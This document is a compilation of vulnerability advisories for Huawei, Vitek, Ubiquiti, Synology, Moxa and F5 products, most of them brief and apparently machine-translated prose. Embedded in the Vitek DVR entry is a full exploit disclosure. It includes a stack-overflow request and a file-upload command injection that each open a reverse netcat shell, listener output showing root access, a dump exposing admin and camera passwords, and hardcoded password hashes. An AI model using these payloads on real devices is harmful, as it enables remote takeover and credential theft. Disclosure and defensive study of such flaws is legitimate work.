The CIDAM Protocol on some Huawei Products has multiple input validation vulnerabilities due to insufficient validation of specific messages when the protocol is implemented. An authenticated remote attacker could send a malicious message to a target system. Successful exploit could allow the attacker to tamper with business and make the system abnormal. Affected Huawei Products are: DP300 versions V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00B012, V500R002C00B013, V500R002C00B014, V500R002C00B017, V500R002C00B018, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC400, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00; RP200 versions V500R002C00SPC200, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE30 versions V100R001C10SPC300, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700B010, V500R002C00SPC200, V500R002C00SPC500, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE40 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC900, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE50 versions V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPCb00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; TE60 versions V100R001C10, V100R001C10B001, V100R001C10B002, V100R001C10B010, V100R001C10B011, V100R001C10B012, V100R001C10B013, V100R001C10B014, V100R001C10B016, V100R001C10B017, V100R001C10B018, V100R001C10B019, V100R001C10SPC400, V100R001C10SPC500, V100R001C10SPC600, V100R001C10SPC700, V100R001C10SPC800B011, V100R001C10SPC900, V500R002C00, V500R002C00B010, V500R002C00B011, V500R002C00SPC100, V500R002C00SPC200, V500R002C00SPC300, V500R002C00SPC600, V500R002C00SPC700, V500R002C00SPC800, V500R002C00SPC900, V500R002C00SPCa00, V500R002C00SPCb00, V500R002C00SPCd00, V500R002C00SPCe00, V600R006C00, V600R006C00SPC100, V600R006C00SPC200, V600R006C00SPC300, V600R006C00SPC400, V600R006C00SPC500; eSpace U1981 version V200R003C20SPC900. Huawei DP300 Contains an input validation vulnerability.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. Huawei DP300 is a video conferencing terminal of China's Huawei company. CIDAM is one of the information transmission protocols. A remote attacker can exploit the vulnerability by sending maliciously constructed information to the target device to cause a denial of service (destroying normal business and system anomalies)

VitekVT-HDOC16BR is Vitek's all-in-one recorder for EX-SDI, TVI, AHD, CVI, IP and Analog (CVBS). There are remote code execution vulnerabilities and information disclosure vulnerabilities in VitekVT-HDOC16BR. An attacker could exploit this vulnerability to execute arbitrary remote code and obtain sensitive information in the context of an affected application. [STX] Subject: Vitek RCE and Information Disclosure (and possible other OEM) Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis <mcw noemail eu> (December 2017) PoC: https://github.com/mcw0/PoC Release date: December 22, 2017 Full Disclosure: 0-day heap: Executable + Non-ASLR stack: Executable + ASLR -[Manufacture Logo]- _ _ _ _ _ _ _ _ _ _ _ _ \ _ _ _ _ _ ___ / /__/ \ |_/ / __ / - _ ___ / / / / / / _ _ _ _/ / / \_/ \_ ______ ___________\___\__________________ -[OEM (found in the code)]- Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R Thrive Wisecon Sanyo Inodic CBC Elbex Y3K KTNC -[Stack Overflow RCE]- [Reverse netcat shell] $ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81 [Listener] $ ncat -vlp 31337 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B Ncat: Listening on :::31337 Ncat: Listening on 0.0.0.0:31337 Ncat: Connection from 192.168.57.20. Ncat: Connection from 192.168.57.20:36356. pwd /opt/fw whoami root exit $ Note: 1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20 2. 0x20 will be replaced with 0x00 by the H4/H1/N1 binary, use this to jump binary included system() address: 0x00114AC8 [system() call in H4] 3. 0x02739A0C + 0x74 = $r11 address we need (0x2739A80) to point our CMD string on heap for system() in $r0 H1: VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6 .rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:001CD138 SUB R3, R11, #0x74 .text:001CD13C MOV R0, R3 .text:001CD140 BL system H4: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R .rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:00114AC8 SUB R3, R11, #0x74 .text:00114ACC MOV R0, R3 .text:00114AD0 BL system N1: VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6 .rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:001E9F0C SUB R3, R11, #0x74 .text:001E9F10 MOV R0, R3 .text:001E9F14 BL system -[PHP RCE]- Note: /mnt/usb2 must be mounted and R/W... (normally R/O w/o USB stick inserted) [Reverse netcat shell (forking)] $ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST 200 OK [...] > ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form> </tbody> [...] [Listener] $ ncat -vlp 31337 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF Ncat: Listening on :::31337 Ncat: Listening on 0.0.0.0:31337 Ncat: Connection from 192.168.57.20. Ncat: Connection from 192.168.57.20:52726. pwd /opt/www/htdocs/system whoami nobody ls -l /mnt/usb2/ total 4 drwxrwxrwx 2 nobody nobody 0 Dec 16 02:55 dvr -rw------- 1 nobody nobody 7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}|| exit $ -[Login / Password Disclosure]- curl -v "http://192.168.57.20:80/menu.env" | hexdump -C [binary config, login and password can be found for admin login and all connected cameras] Admin l/p [...] 00001380 00 00 00 00 01 01 00 01 01 01 01 00 00 00 00 00 |................| 00001390 00 00 00 00 00 41 44 4d 49 4e 00 00 00 00 00 00 |.....ADMIN......| 000013a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00001400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 32 |..............12| 00001410 33 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |34..............| 00001420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| Cameras l/p [...] 00008d80 00 00 00 00 c0 00 a8 00 01 00 15 00 92 1f 00 00 |................| 00008d90 91 1f 00 00 72 6f 6f 74 00 00 00 00 00 00 00 00 |....root........| 00008da0 00 00 00 00 70 61 73 73 00 00 00 00 00 00 00 00 |....pass........| 00008db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00008dc0 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 a8 00 |................| 00008dd0 01 00 16 00 94 1f 00 00 93 1f 00 00 72 6f 6f 74 |............root| 00008de0 00 00 00 00 00 00 00 00 00 00 00 00 70 61 73 73 |............pass| 00008df0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| -[Hardcode l/p]- FTP: TCP/10021 TELNET: TCP/10023 /etc/passwd root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh -[Korean hardcoded DNS]- $ cat /etc/resolv.conf nameserver 168.126.63.1 nameserver 0.0.0.0 nameserver 0.0.0.0 $ $ nslookup 168.126.63.1 1.63.126.168.in-addr.arpa name = kns.kornet.net. $ nslookup 168.126.63.2 2.63.126.168.in-addr.arpa name = kns2.kornet.net. -[Other Information Disclosure]- curl -v "http://192.168.57.20:80/webviewer/netinfo.dat" 192,168,57,20 192,168,2,100 00:0A:2F:XX:XX:XX 00:0A:2F:YY:YY:YY 255.255.255.0 192.168.57.1 -[MAC Address Details]- Company: Artnix Inc. Address: Seoul 137-819, KOREA, REPUBLIC OF Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF Type: IEEE MA-L curl -v "http://192.168.57.20:80/webviewer/gw.dat" Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 192.168.2.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1 192.168.57.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 0.0.0.0 192.168.57.1 0.0.0.0 UG 0 0 0 eth0 curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0" Change GUI Language to English [... and more] [ETX]

Huawei HG8245H version earlier than V300R018C00SPC110 has an authentication bypass vulnerability. An attacker can access a specific URL of the affect product. Due to improper verification of the privilege, successful exploitation may cause information leak. Huawei HG8245H Contains an information disclosure vulnerability.Information may be obtained. HuaweiHG8245H is a modem from China's Huawei company. An attacker could exploit the vulnerability to obtain information

Ubiquiti UniFi Video before 3.8.0 for Windows uses weak permissions for the installation directory, which allows local users to gain SYSTEM privileges via a Trojan horse taskkill.exe file. Ubiquiti UniFi Video Contains a permission vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. UbiquitiUniFiVideo is a network camera product from Ubiquiti Networks of the United States. A local privilege elevation vulnerability exists in UbiquitiUniFiVideo. A local attacker could exploit this vulnerability to execute arbitrary code with elevated privileges. A security vulnerability exists in Ubiquiti UniFi Video versions earlier than 3.8.0 based on the Windows platform. The vulnerability is caused by the program assigning weak permissions to the installation path

An improper access control vulnerability in synodsmnotify in Synology DiskStation Manager (DSM) before 6.1.4-15217 and before 6.0.3-8754-6 allows local users to inject arbitrary web script or HTML via the -fn option. Synology DiskStation Manager (DSM) Contains an injection vulnerability.Information may be obtained and information may be altered. Synology DiskStation Manager (DSM) is an operating system developed by Synology for network storage servers (NAS). The operating system can manage data, documents, photos, music and other information. Synology DSM versions earlier than 6.1.4-15217 and synodsmnotify in versions earlier than 6.0.3-8754-6 have an access control error vulnerability

A Credentials Management issue was discovered in Moxa NPort W2150A versions prior to 1.11, and NPort W2250A versions prior to 1.11. The default password is empty on the device. An unauthorized user can access the device without a password. An unauthorized user has the ability to completely compromise the confidentiality and integrity of the wireless traffic. Moxa NPort W2150A and NPort W2250A Contains vulnerabilities related to certificate and password management.Information may be obtained and information may be altered. Moxa's NPortW2150A and NPortW2250A are both serial communication servers used by Moxa to connect industrial serial devices to the network. This may lead to further attacks

In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator and WebSafe software version 13.0.0, 12.0.0 - 12.1.2, 11.6.0 - 11.6.1 and 11.5.0 - 11.5.4, in some circumstances, Traffic Management Microkernel (TMM) does not properly handle certain malformed TLS1.2 records, which allows remote attackers to cause a denial-of-service (DoS) or possible remote command execution on the BIG-IP system. plural F5 BIG-IP There is an input validation vulnerability in the product software.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. F5 BIG-IP LTM, etc. are all products of F5 Company in the United States. F5 BIG-IP LTM is a local traffic manager; BIG-IP AAM is an application acceleration manager. A security vulnerability exists in several F5 products. The vulnerability stems from the Traffic Management Microkernel (TMM) not properly handling malformed TLS1.2 records. A remote attacker could exploit this vulnerability to cause a denial of service or execute commands on the BIG-IP system. The following products and versions are affected: F5 BIG-IP LTM Release 13.0.0, Release 12.0.0 to Release 12.1.2, Release 11.6.0 to Release 11.6.1, Release 11.5.0 to Release 11.5.4; BIG-IP AAM 13.0.0, 12.0.0 to 12.1.2, 11.6.0 to 11.6.1, 11.5.0 to 11.5.4; BIG-IP AFM 13.0.0, 12.0.0 to Version 12.1.2, Version 11.6.0 to Version 11.6.1, Version 11.5.0 to Version 11.5.4; BIG-IP Analytics Version 13.0.0, Version 12.0.0 to Version 12.1.2, Version 11.6.0 to Version 11.6 .1 version, 11.5.0 to 11.5.4 version; BIG-IP APM version 13.0.0, 12.0.0 to 12.1.2 version, 11.6.0 to 11.6.1 version, 11.5.0 to 11.5 version. 4 version; BIG-IP ASM version 13.0.0, 12.0.0 to 12.1.2, 11.6.0 to 11.6.1, 11.5.0 to 11.5.4; BIG-IP DNS 13.0.0 , Version 12.0.0 to Version 12.1.2, Version 11.6.0 to Version 11.6.1, Version 11.5.0 to Version 11.5.4; BIG-IP Edge Gateway Version 13.0.0, Version 12.0.0 to Version 12.1.2 , 11.6.0 to 11.6.1, 11.5.0 to 11.5.4; BIG-IP GTM 13.0.0, 12.0.0 to 12.1.2, 11.6.0 to 11.6

In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, Link Controller, PEM and WebSafe software version 13.0.0 and 12.1.0 - 12.1.2, race conditions in iControl REST may lead to commands being executed with different privilege levels than expected. plural F5 BIG-IP There is a race condition vulnerability in the product software.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. F5 BIG-IP LTM, etc. are all products of F5 Company in the United States. F5 BIG-IP LTM is a local traffic manager; BIG-IP AAM is an application acceleration manager. A race condition vulnerability exists in several F5 products. An attacker can exploit this vulnerability to execute commands with other privileges. The following products and versions are affected: F5 BIG-IP LTM Version 13.0.0 and Version 12.1.0 through Version 12.1.2; BIG-IP AAM Version 13.0.0 and Version 12.1.0 through Version 12.1.2; BIG-IP AFM Version 13.0.0 and 12.1.0 to 12.1.2; BIG-IP Analytics 13.0.0 and 12.1.0 to 12.1.2; BIG-IP APM 13.0.0 and 12.1.0 to 12.1. 2 version; BIG-IP ASM version 13.0.0 and 12.1.0 through 12.1.2; BIG-IP DNS version 13.0.0 and 12.1.0 through 12.1.2; BIG-IP Link Controller version 13.0.0 and 12.1.0 through 12.1.2; BIG-IP PEM version 13.0.0 and 12.1.0 through 12.1.2; BIG-IP WebSafe 13.0.0 and 12.1.0 through 12.1.2; BIG -IQ Centralized Management version 5.2.0 to version 5.3.0

IPv6 function in Huawei Quidway S2700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, S2300 V200R003C00, V200R003C00SPC300T, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S2700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5300 V200R003C00, V200R003C00SPC300T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R005C05, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5700 V200R003C00, V200R003C00SPC316T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S600-E V200R008C00, V200R009C00, S6300 V200R003C00, V200R005C00, V200R007C00, V200R008C00, V200R009C00, S6700 V200R003C00, V200R005C00, V200R005C01, V200R005C02, V200R007C00, V200R008C00, V200R009C00 has an out-of-bounds read vulnerability. An unauthenticated attacker may send crafted malformed IPv6 packets to the affected products. Due to insufficient verification of the packets, successful exploit will cause device to reset. plural Huawei The product contains an out-of-bounds vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Huawei Quidway S2700 and other Huawei S series switches are Huawei products. The following products and versions are affected: Huawei Quidway S2700 V200R003C00SPC300 Version; Quidway S5300 V200R003C00SPC300 Version; Quidway S5700 V200R003C00SPC300 Version; S2300 V200R003C00 Version, V200R003C00SPC300T Version, V200R005C00 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R009C00 Version; S2700 V200R005C00 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R009C00 Version; S5300 V200R003C00 Version, V200R003C00SPC300T Version, V200R003C00SPC600 Version, V200R003C02 Version, V200R005C00 Version, V200R005C01 Version, V200R005C02 Version, V200R005C03 Version, V200R005C05 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R009C00 Version ; S5700 etc

Huawei S12700 V200R008C00, V200R009C00, S5700 V200R007C00, V200R008C00, V200R009C00, S6700 V200R008C00, V200R009C00, S7700 V200R008C00, V200R009C00, S9700 V200R008C00, V200R009C00 have a numeric errors vulnerability. An unauthenticated, remote attacker may send specific TCP messages with keychain authentication option to the affected products. Due to the improper validation of the messages, it will cause numeric errors when handling the messages. Successful exploit will cause the affected products to reset. plural Huawei The product contains a numerical processing vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. HuaweiS12700 is an intelligent routing switch of China Huawei. A numerical calculation error vulnerability exists in several Huawei router products. The vulnerability stems from a program that fails to adequately verify the message. There are security vulnerabilities in several Huawei products. The following products and versions are affected: Huawei S12700 V200R008C00 Version, V200R009C00 Version; S5700 V200R007C00 Version, V200R008C00 Version, V200R009C00 Version; S6700 V200R008C00 Version, V200R009C00 Version; S7700 V200R008C00 Version, V200R009C00 Version; S9700 V200R008C00 Version, V200R009C00 Version

The Flp Driver in some Huawei smartphones of the software Vicky-AL00AC00B124D, Vicky-AL00AC00B157D, Vicky-AL00AC00B167 has a double free vulnerability. An attacker can trick a user to install a malicious application which has a high privilege to exploit this vulnerability. Successful exploitation may cause denial of service (DoS) attack. Huawei Smartphone software contains a double release vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. HuaweiVicky-AL00A is a smartphone device from China's Huawei company. Flpdriver is a Flp driver used in it. The following versions are affected: Huawei Vicky-AL00A Vicky-AL00AC00B124D version, Vicky-AL00AC00B157D version, Vicky-AL00AC00B167 version